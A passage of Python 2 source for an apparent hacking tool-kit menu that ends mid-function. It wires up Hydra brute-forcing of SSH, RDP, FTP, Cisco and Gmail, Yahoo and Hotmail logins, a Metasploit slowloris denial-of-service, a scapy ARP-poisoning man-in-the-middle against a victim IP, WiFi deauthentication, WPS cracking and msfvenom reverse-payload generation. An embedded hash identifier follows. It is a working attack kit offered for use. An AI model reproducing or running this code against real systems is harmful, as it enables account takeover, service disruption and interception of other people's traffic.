- print - print " [01] Cisco Brute Force " - print " [02] VNC Brute Force " - print " [03] FTP Brute Force " - print " [04] Gmail Brute Force " - print " [05] SSH Brute Force " - print " [06] TeamSpeak Brute Force " - print " [07] Telnet Brute Force " - print " [08] Yahoo Mail Brute Force " - print " [09] Hotmail Brute Force " - print " [10] Router Speedy Brute Force " - print " [11] RDP Brute Force " - print " [12] MySQL Brute Force " - print - print " [00] Exit" - print - bhydra = raw_input("[*] B-Hydra > ") - - if bhydra == '01' or bhydra == '1': - print - print " +---------------------------+" - print " | Cisco Brute Force |" - print " +---------------------------+" - print - print - iphost = raw_input("[*] IP/Hostname : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -P %s %s cisco" % (word, iphost)) - sys.exit() - - elif bhydra == '02' or bhydra == '2': - print - print " +---------------------------+" - print " | VNC Brute Force |" - print " +---------------------------+" - print - print - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -P %s -e n -t 1 %s vnc -V" % (word, iphost)) - iphost = raw_input("[*] IP/Hostname : ") - - elif bhydra == '03' or bhydra == '3': - print - print " +------------------------------+" - print " | FTP Brute Force |" - print " +------------------------------+" - print - print - user = raw_input("[*] User : ") - iphost = raw_input("[*] IP/Hostname : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -l %s -P %s %s ftp" % (user, word, iphost)) - sys.exit() - - elif bhydra == '04' or bhydra == '4': - print - print " +------------------------------+" - print " | Gmail Brute Force |" - print " +------------------------------+" - print - print - email = raw_input("[*] Email : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -l %s -P %s -s 465 smtp.gmail.com smtp" % (email, word)) - sys.exit() - - elif bhydra == '05' or bhydra == '5': - print - print " +--------------------------------+" - print " | SSH Brute Force |" - print " +--------------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -l %s -P %s %s ssh" % (user, word, iphost)) - sys.exit() - - elif bhydra == '06' or bhydra == '6': - print - print " +-------------------------+" - print " | TeamSpeak Brute Force |" - print " +-------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -l %s -P %s -s 8676 %s teamspeak" % (user, word, iphost)) - sys.exit() - - elif bhydra == '07' or bhydra == '7': - print - print " +-------------------------+" - print " | Telnet Brute Force |" - print " +-------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -l %s -P %s %s telnet" % (user, word, iphost)) - sys.exit() - - elif bhydra == '08' or bhydra == '8': - print - print " +---------------------------+" - print " | Yahoo Brute Force |" - print " +---------------------------+" - print - print - email = raw_input("[*] Email : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -l %s -P %s -s 587 smtp.mail.yahoo.com smtp" % (email, word)) - sys.exit() - - elif bhydra == '09' or bhydra == '9': - print - print " +----------------------------+" - print " | Hotmail Brute Force |" - print " +----------------------------+" - print - print - email = raw_input("[*] Email : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -l %s -P %s -s 587 smtp.live.com smtp" % (email, word)) - sys.exit() - - elif bhydra == '10': - print - print " +-----------------------------+" - print " | Router Speedy Brute Force |" - print " +-----------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -m / -l %s -P %s %s http-get" % (user, word, iphost)) - sys.exit() - - elif bhydra == '11': - print - print " +----------------------------+" - print " | RDP Brute Force |" - print " +----------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - iphost = raw_input("[*] IP/Hostname : ") - os.system("hydra -t 1 -V -f -l %s -P %s %s rdp" % (user, word, iphost)) - sys.exit() - - elif bhydra == '12': - print - print " +-----------------------------+" - print " | MySQL Brute Force |" - print " +-----------------------------+" - print - print - user = raw_input("[*] User : ") - word = raw_input("[*] Wordlist : ") - os.system("hydra -t 5 -V -f -l %s -e ns -P %s localhost mysql" % (user, word)) - - elif bhydra == '00' or bhydra == '0': - print "\n[!] Exit the Program..." - sys.exit() - - else: - print "\n[!] ERROR : Wrong Input" - time.sleep(1) - restart_program() -def cupp(): - os.system("cd /root/hackers-tool-kit/wordlists && cupp -i") - print Y+"wordlist saved to /root/hackers-tool-kit/wordlists\033[0m" -def vdir(): - print "\n" - os.system("ls") - print Y+"! doesnt have to be these can be any directory !\033[0m" - print "\n" - h = raw_input("Directory Path: ") - print "\n" - print "--------------------------------------------------------------------------------------------------------------------------------------------" - os.system("ls " + h) - print "--------------------------------------------------------------------------------------------------------------------------------------------" - -def monoff(): - os.system("iwconfig") - i = raw_input("Select Interface: ") - os.system("airmon-ng stop " + i) -def vpn(): - os.system("anonsurf start") - os.system("anonsurf myip") -def vpnoff(): - os.system("anonsurf stop") - os.system("anonsurf myip") -def slowl(): - de = raw_input("Delay: ") - tar = raw_input("RHOST: ") - port = raw_input("RPORT: ") - soc = raw_input("Sockets: ") - os.system('echo "use auxiliary/dos/http/slowloris\n" > handler.rc') - os.system('echo "set delay {0}\n" >> handler.rc'.format(de)) - os.system('echo "set RHOST {0}\n" >> handler.rc'.format(tar)) - os.system('echo "set RPORT {0}\n" >> handler.rc'.format(port)) - os.system('echo "set sockets {0}\n" >> handler.rc'.format(soc)) - os.system('echo "run\n" >> handler.rc') - os.system('msfconsole -r handler.rc') - os.system('rm -rf handler.rc') - -def pidox(): - print Y+"! USING FIREFOX !\033[0m" - os.system("sleep 2") - os.system("firefox https://pipl.com/") -def specnet(): - jk = raw_input("BSSID: ") - kj = raw_input("ESSID: ") - os.system("iwconfig") - k = raw_input("INTERFACE: ") - print Y+"WOULD YOU LIKE TO SAVE YOUR SCAN RESULTS?\033[0m" - j = raw_input("[y/n]> ") - if j == "y": - a = 'airodump-ng -w /root/SCAN --bssid {0} --essid {1} {2}'.format(jk,kj,k) - os.system(a) - if j == "n": - a = 'airodump-ng --bssid {0} --essid {1} {2}'.format(jk,kj,k) - os.system(a) -def pingen(): - j = raw_input("Enter BSSID: ") - a = 'cd /root/hackers-tool-kit/tools && python pingen.py {0}'.format(j) - os.system(a) -def reaver(): - os.system("iwconfig") - j = raw_input("Select Interface: ") - k = raw_input("Enter BSSID: ") - a = 'reaver -i {0} -b {1} -vv'.format(j,k) - os.system(a) -def deauth(): - print Y+"! YOU MAY HAVE TO CHANGE YOUR WIFI CHANNEL !\033[0m" - j = raw_input("Enter BSSID> ") - os.system("iwconfig") - k = raw_input("Enter Interface> ") - a = 'aireplay-ng -0 0 -a {0} {1}'.format(j,k) - os.system(a) -def macc(): - os.system("iwconfig") - k = raw_input("Interface: ") - c = 'ifconfig {0} down'.format(k) - os.system(c) - os.system("macchanger -r " + k) - s = 'ifconfig {0} up'.format(k) - os.system(s) -def macoff(): - os.system("iwconfig") - k = raw_input("Interface: ") - c = 'ifconfig {0} down'.format(k) - os.system(c) - os.system("macchanger -p " + k) - s = 'ifconfig {0} up'.format(k) - os.system(s) -def arppois(): - - try: - os.system("iwconfig") - interface = raw_input("[*] Enter Interface: ") - victimIP = raw_input("[*] Enter Victim IP: ") - gateIP = raw_input("[*] Enter Router IP: ") - except KeyboardInterrupt: - print "\n[*] User Requested Shutdown" - print "[*] Exiting..." - os.system("clear") - mainbanner() - - print "\n[*] Enabling IP Forwarding...\n" - os.system("echo 1 > /proc/sys/net/ipv4/ip_forward") - - def get_mac(IP): - conf.verb = 0 - ans, unans = srp(Ether(dst = "ff:ff:ff:ff:ff:ff")/ARP(pdst = IP), timeout = 2, iface = interface, inter = 0.1) - for snd,rcv in ans: - return rcv.sprintf(r"%Ether.src%") - - def reARP(): - - print "\n[*] Restoring Targets..." - victimMAC = get_mac(victimIP) - gateMAC = get_mac(gateIP) - send(ARP(op = 2, pdst = gateIP, psrc = victimIP, hwdst = "ff:ff:ff:ff:ff:ff", hwsrc = victimMAC), count = 7) - send(ARP(op = 2, pdst = victimIP, psrc = gateIP, hwdst = "ff:ff:ff:ff:ff:ff", hwsrc = gateMAC), count = 7) - print "[*] Disabling IP Forwarding..." - os.system("echo 0 > /proc/sys/net/ipv4/ip_forward") - print "[*] Shutting Down..." - os.system("clear") - mainbanner() - - def trick(gm, vm): - send(ARP(op = 2, pdst = victimIP, psrc = gateIP, hwdst= vm)) - send(ARP(op = 2, pdst = gateIP, psrc = victimIP, hwdst= gm)) - - def mitm(): - try: - victimMAC = get_mac(victimIP) - except Exception: - os.system("echo 0 > /proc/sys/net/ipv4/ip_forward") - print "[!] Couldn't Find Victim MAC Address" - print "[!] Exiting..." - os.system("clear") - mainbanner() - try: - gateMAC = get_mac(gateIP) - except Exception: - os.system("echo 0 > /proc/sys/net/ipv4/ip_forward") - print "[!] Couldn't Find Gateway MAC Address" - print "[!] Exiting..." - os.system("clear") - mainbanner() - print "[*] Poisoning Targets..." - while 1: - try: - trick(gateMAC, victimMAC) - time.sleep(1.5) - except KeyboardInterrupt: - reARP() - break - mitm() -def sslscan(): - j = raw_input('Enter Target: ') - a = 'sslscan {0}'.format(j) - os.system(a) -def payload(): - os.system("cat /root/hackers-tool-kit/tools/payloads.txt") - print "\n" - f = raw_input("Select Payload: ") - l = raw_input("LHOST: ") - c = raw_input("LPORT: ") - os.system("cat /root/hackers-tool-kit/tools/formats.txt") - s = raw_input("Format: ") - h = raw_input("File Name: ") - a = 'msfvenom -p {0} LHOST={1} LPORT={2} -f {3} -o /root/{4}.{5}'.format(f,l,c,s,h,s) - os.system(a) -def crunch(): - print "minimal number of characters" - j = raw_input("[CRUNCH]: ") - print "maximum number of characters" - k = raw_input("[CRUNCH]: ") - print "what characters should be in it" - b = raw_input("[CRUNCH]: ") - print "name of file" - s = raw_input("[CRUNCH]: ") - a = 'crunch {0} {1} {2} -o /root/hackers-tool-kit/wordlists/{3}'.format(j,k,b,s) - os.system(a) - print Y+"wordlist saved to \033[0m/root/hackers-tool-kit/wordlists/" + s -def traff(): - os.system("iwconfig") - s = raw_input("Select Interface: ") - os.system("tcpdump -i " + s) -def resa(): - j = raw_input("USERNAME: ") - k = raw_input("NEW PASSWORD: ") - print "are you sure?" - q = raw_input("[y/n]: ") - if q == "n": - os.system("clear") - mainbanner() - if q == "y": - a = 'echo "{0}:{1}" | chpasswd'.format(j,k) - print "password for {0} has been reset".format(j) -def resu(): - j = raw_input("PASSWORD: ") - print "are you sure?" - q = raw_input("[y/n]: ") - if q == "n": - os.system("clear") - mainbanner() - if q == "y": - a = 'passwd {0}'.format(j) - print "unix password has been reset".format(j) -def hashid(): - #!/usr/bin/python - # encoding: utf-8 - # Hash Identifier v1.1 - # By Zion3R - # www.Blackploit.com - # Root@Blackploit.com - - logo=''' ######################################################################### - # __ __ __ ______ _____ # - # /\ \/\ \ /\ \ /\__ _\ /\ _ `\ # - # \ \ \_\ \ __ ____ \ \ \___ \/_/\ \/ \ \ \/\ \ # - # \ \ _ \ /'__`\ / ,__\ \ \ _ `\ \ \ \ \ \ \ \ \ # - # \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \ \_\ \__ \ \ \_\ \ # - # \ \_\ \_\ \___ \_\/\____/ \ \_\ \_\ /\_____\ \ \____/ # - # \/_/\/_/\/__/\/_/\/___/ \/_/\/_/ \/_____/ \/___/ v1.1 # - # By Zion3R # - # www.Blackploit.com # - # Root@Blackploit.com # - #########################################################################''' - - algorithms={"102020":"ADLER-32", "102040":"CRC-32", "102060":"CRC-32B", "101020":"CRC-16", "101040":"CRC-16-CCITT", "104020":"DES(Unix)", "101060":"FCS-16", "103040":"GHash-32-3", "103020":"GHash-32-5", "115060":"GOST R 34.11-94", "109100":"Haval-160", "109200":"Haval-160(HMAC)", "110040":"Haval-192", "110080":"Haval-192(HMAC)", "114040":"Haval-224", "114080":"Haval-224(HMAC)", "115040":"Haval-256", "115140":"Haval-256(HMAC)", "107080":"Lineage II C4", "106025":"Domain Cached Credentials - MD4(MD4(($pass)).(strtolower($username)))", "102080":"XOR-32", "105060":"MD5(Half)", "105040":"MD5(Middle)", "105020":"MySQL", "107040":"MD5(phpBB3)", "107060":"MD5(Unix)", "107020":"MD5(Wordpress)", "108020":"MD5(APR)", "106160":"Haval-128", "106165":"Haval-128(HMAC)", "106060":"MD2", "106120":"MD2(HMAC)", "106040":"MD4", "106100":"MD4(HMAC)", "106020":"MD5", "106080":"MD5(HMAC)", "106140":"MD5(HMAC(Wordpress))", "106029":"NTLM", "106027":"RAdmin v2.x", "106180":"RipeMD-128", "106185":"RipeMD-128(HMAC)", "106200":"SNEFRU-128", "106205":"SNEFRU-128(HMAC)", "106220":"Tiger-128", "106225":"Tiger-128(HMAC)", "106240":"md5($pass.$salt)", "106260":"md5($salt.'-'.md5($pass))", "106280":"md5($salt.$pass)", "106300":"md5($salt.$pass.$salt)", "106320":"md5($salt.$pass.$username)", "106340":"md5($salt.md5($pass))", "106360":"md5($salt.md5($pass).$salt)", "106380":"md5($salt.md5($pass.$salt))", "106400":"md5($salt.md5($salt.$pass))", "106420":"md5($salt.md5(md5($pass).$salt))", "106440":"md5($username.0.$pass)", "106460":"md5($username.LF.$pass)", "106480":"md5($username.md5($pass).$salt)", "106500":"md5(md5($pass))", "106520":"md5(md5($pass).$salt)", "106540":"md5(md5($pass).md5($salt))", "106560":"md5(md5($salt).$pass)", "106580":"md5(md5($salt).md5($pass))", "106600":"md5(md5($username.$pass).$salt)", "106620":"md5(md5(md5($pass)))", "106640":"md5(md5(md5(md5($pass))))", "106660":"md5(md5(md5(md5(md5($pass)))))", "106680":"md5(sha1($pass))", "106700":"md5(sha1(md5($pass)))", "106720":"md5(sha1(md5(sha1($pass))))", "106740":"md5(strtoupper(md5($pass)))", "109040":"MySQL5 - SHA-1(SHA-1($pass))", "109060":"MySQL 160bit - SHA-1(SHA-1($pass))", "109180":"RipeMD-160(HMAC)", "109120":"RipeMD-160", "109020":"SHA-1", "109140":"SHA-1(HMAC)", "109220":"SHA-1(MaNGOS)", "109240":"SHA-1(MaNGOS2)", "109080":"Tiger-160", "109160":"Tiger-160(HMAC)", "109260":"sha1($pass.$salt)", "109280":"sha1($salt.$pass)", "109300":"sha1($salt.md5($pass))", "109320":"sha1($salt.md5($pass).$salt)", "109340":"sha1($salt.sha1($pass))", "109360":"sha1($salt.sha1($salt.sha1($pass)))", "109380":"sha1($username.$pass)", "109400":"sha1($username.$pass.$salt)", "1094202":"sha1(md5($pass))", "109440":"sha1(md5($pass).$salt)", "109460":"sha1(md5(sha1($pass)))", "109480":"sha1(sha1($pass))", "109500":"sha1(sha1($pass).$salt)", "109520":"sha1(sha1($pass).substr($pass,0,3))", "109540":"sha1(sha1($salt.$pass))", "109560":"sha1(sha1(sha1($pass)))", "109580":"sha1(strtolower($username).$pass)", "110020":"Tiger-192", "110060":"Tiger-192(HMAC)", "112020":"md5($pass.$salt) - Joomla", "113020":"SHA-1(Django)", "114020":"SHA-224", "114060":"SHA-224(HMAC)", "115080":"RipeMD-256", "115160":"RipeMD-256(HMAC)", "115100":"SNEFRU-256", "115180":"SNEFRU-256(HMAC)", "115200":"SHA-256(md5($pass))", "115220":"SHA-256(sha1($pass))", "115020":"SHA-256", "115120":"SHA-256(HMAC)", "116020":"md5($pass.$salt) - Joomla", "116040":"SAM - (LM_hash:NT_hash)", "117020":"SHA-256(Django)", "118020":"RipeMD-320", "118040":"RipeMD-320(HMAC)", "119020":"SHA-384", "119040":"SHA-384(HMAC)", "120020":"SHA-256", "121020":"SHA-384(Django)", "122020":"SHA-512", "122060":"SHA-512(HMAC)", "122040":"Whirlpool", "122080":"Whirlpool(HMAC)"} - - # hash.islower() minusculas - # hash.isdigit() numerico - # hash.isalpha() letras - # hash.isalnum() alfanumerico - - def CRC16(): - hs='4607' - if len(hash)==len(hs) and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("101020") - def CRC16CCITT(): - hs='3d08' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("101040") - def FCS16(): - hs='0e5b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("101060") - - def CRC32(): - hs='b33fd057' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("102040") - def ADLER32(): - hs='0607cb42' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("102020") - def CRC32B(): - hs='b764a0d9' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("102060") - def XOR32(): - hs='0000003f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("102080") - - def GHash323(): - hs='80000000' - if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("103040") - def GHash325(): - hs='85318985' - if len(hash)==len(hs) and hash.isdigit()==True and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("103020") - - def DESUnix(): - hs='ZiY8YtDKXJwYQ' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False: - jerar.append("104020") - - def MD5Half(): - hs='ae11fd697ec92c7c' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("105060") - def MD5Middle(): - hs='7ec92c7c98de3fac' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("105040") - def MySQL(): - hs='63cea4673fd25f46' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("105020") - - def DomainCachedCredentials(): - hs='f42005ec1afe77967cbc83dce1b4d714' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106025") - def Haval128(): - hs='d6e3ec49aa0f138a619f27609022df10' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106160") - def Haval128HMAC(): - hs='3ce8b0ffd75bc240fc7d967729cd6637' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106165") - def MD2(): - hs='08bbef4754d98806c373f2cd7d9a43c4' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106060") - def MD2HMAC(): - hs='4b61b72ead2b0eb0fa3b8a56556a6dca' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106120") - def MD4(): - hs='a2acde400e61410e79dacbdfc3413151' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106040") - def MD4HMAC(): - hs='6be20b66f2211fe937294c1c95d1cd4f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106100") - def MD5(): - hs='ae11fd697ec92c7c98de3fac23aba525' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106020") - def MD5HMAC(): - hs='d57e43d2c7e397bf788f66541d6fdef9' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106080") - def MD5HMACWordpress(): - hs='3f47886719268dfa83468630948228f6' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106140") - def NTLM(): - hs='cc348bace876ea440a28ddaeb9fd3550' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106029") - def RAdminv2x(): - hs='baea31c728cbf0cd548476aa687add4b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106027") - def RipeMD128(): - hs='4985351cd74aff0abc5a75a0c8a54115' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106180") - def RipeMD128HMAC(): - hs='ae1995b931cf4cbcf1ac6fbf1a83d1d3' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106185") - def SNEFRU128(): - hs='4fb58702b617ac4f7ca87ec77b93da8a' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106200") - def SNEFRU128HMAC(): - hs='59b2b9dcc7a9a7d089cecf1b83520350' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106205") - def Tiger128(): - hs='c086184486ec6388ff81ec9f23528727' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106220") - def Tiger128HMAC(): - hs='c87032009e7c4b2ea27eb6f99723454b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106225") - def md5passsalt(): - hs='5634cc3b922578434d6e9342ff5913f7' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106240") - def md5saltmd5pass(): - hs='245c5763b95ba42d4b02d44bbcd916f1' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106260") - def md5saltpass(): - hs='22cc5ce1a1ef747cd3fa06106c148dfa' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106280") - def md5saltpasssalt(): - hs='469e9cdcaff745460595a7a386c4db0c' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106300") - def md5saltpassusername(): - hs='9ae20f88189f6e3a62711608ddb6f5fd' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106320") - def md5saltmd5pass(): - hs='aca2a052962b2564027ee62933d2382f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106340") - def md5saltmd5passsalt(): - hs='de0237dc03a8efdf6552fbe7788b2fdd' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106360") - def md5saltmd5passsalt(): - hs='5b8b12ca69d3e7b2a3e2308e7bef3e6f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106380") - def md5saltmd5saltpass(): - hs='d8f3b3f004d387086aae24326b575b23' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106400") - def md5saltmd5md5passsalt(): - hs='81f181454e23319779b03d74d062b1a2' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106420") - def md5username0pass(): - hs='e44a60f8f2106492ae16581c91edb3ba' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106440") - def md5usernameLFpass(): - hs='654741780db415732eaee12b1b909119' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106460") - def md5usernamemd5passsalt(): - hs='954ac5505fd1843bbb97d1b2cda0b98f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106480") - def md5md5pass(): - hs='a96103d267d024583d5565436e52dfb3' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106500") - def md5md5passsalt(): - hs='5848c73c2482d3c2c7b6af134ed8dd89' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106520") - def md5md5passmd5salt(): - hs='8dc71ef37197b2edba02d48c30217b32' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106540") - def md5md5saltpass(): - hs='9032fabd905e273b9ceb1e124631bd67' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106560") - def md5md5saltmd5pass(): - hs='8966f37dbb4aca377a71a9d3d09cd1ac' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106580") - def md5md5usernamepasssalt(): - hs='4319a3befce729b34c3105dbc29d0c40' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106600") - def md5md5md5pass(): - hs='ea086739755920e732d0f4d8c1b6ad8d' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106620") - def md5md5md5md5pass(): - hs='02528c1f2ed8ac7d83fe76f3cf1c133f' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106640") - def md5md5md5md5md5pass(): - hs='4548d2c062933dff53928fd4ae427fc0' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106660") - def md5sha1pass(): - hs='cb4ebaaedfd536d965c452d9569a6b1e' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106680") - def md5sha1md5pass(): - hs='099b8a59795e07c334a696a10c0ebce0' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106700") - def md5sha1md5sha1pass(): - hs='06e4af76833da7cc138d90602ef80070' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106720") - def md5strtouppermd5pass(): - hs='519de146f1a658ab5e5e2aa9b7d2eec8' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("106740") - - def LineageIIC4(): - hs='0x49a57f66bd3d5ba6abda5579c264a0e4' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True and hash[0:2].find('0x')==0: - jerar.append("107080") - def MD5phpBB3(): - hs='$H$9kyOtE8CDqMJ44yfn9PFz2E.L2oVzL1' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$H$')==0: - jerar.append("107040") - def MD5Unix(): - hs='$1$cTuJH0Ju$1J8rI.mJReeMvpKUZbSlY/' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$1$')==0: - jerar.append("107060") - def MD5Wordpress(): - hs='$P$BiTOhOj3ukMgCci2juN0HRbCdDRqeh.' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$P$')==0: - jerar.append("107020") - - def MD5APR(): - hs='$apr1$qAUKoKlG$3LuCncByN76eLxZAh/Ldr1' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash[0:4].find('$apr')==0: - jerar.append("108020") - - def Haval160(): - hs='a106e921284dd69dad06192a4411ec32fce83dbb' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109100") - def Haval160HMAC(): - hs='29206f83edc1d6c3f680ff11276ec20642881243' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109200") - def MySQL5(): - hs='9bb2fb57063821c762cc009f7584ddae9da431ff' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109040") - def MySQL160bit(): - hs='*2470c0c06dee42fd1618bb99005adca2ec9d1e19' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:1].find('*')==0: - jerar.append("109060") - def RipeMD160(): - hs='dc65552812c66997ea7320ddfb51f5625d74721b' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109120") - def RipeMD160HMAC(): - hs='ca28af47653b4f21e96c1235984cb50229331359' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109180") - def SHA1(): - hs='4a1d4dbc1e193ec3ab2e9213876ceb8f4db72333' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109020") - def SHA1HMAC(): - hs='6f5daac3fee96ba1382a09b1ba326ca73dccf9e7' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109140") - def SHA1MaNGOS(): - hs='a2c0cdb6d1ebd1b9f85c6e25e0f8732e88f02f96' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109220") - def SHA1MaNGOS2(): - hs='644a29679136e09d0bd99dfd9e8c5be84108b5fd' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109240") - def Tiger160(): - hs='c086184486ec6388ff81ec9f235287270429b225' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109080") - def Tiger160HMAC(): - hs='6603161719da5e56e1866e4f61f79496334e6a10' - if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: - jerar.append("109160") - def sha1passsalt(): - 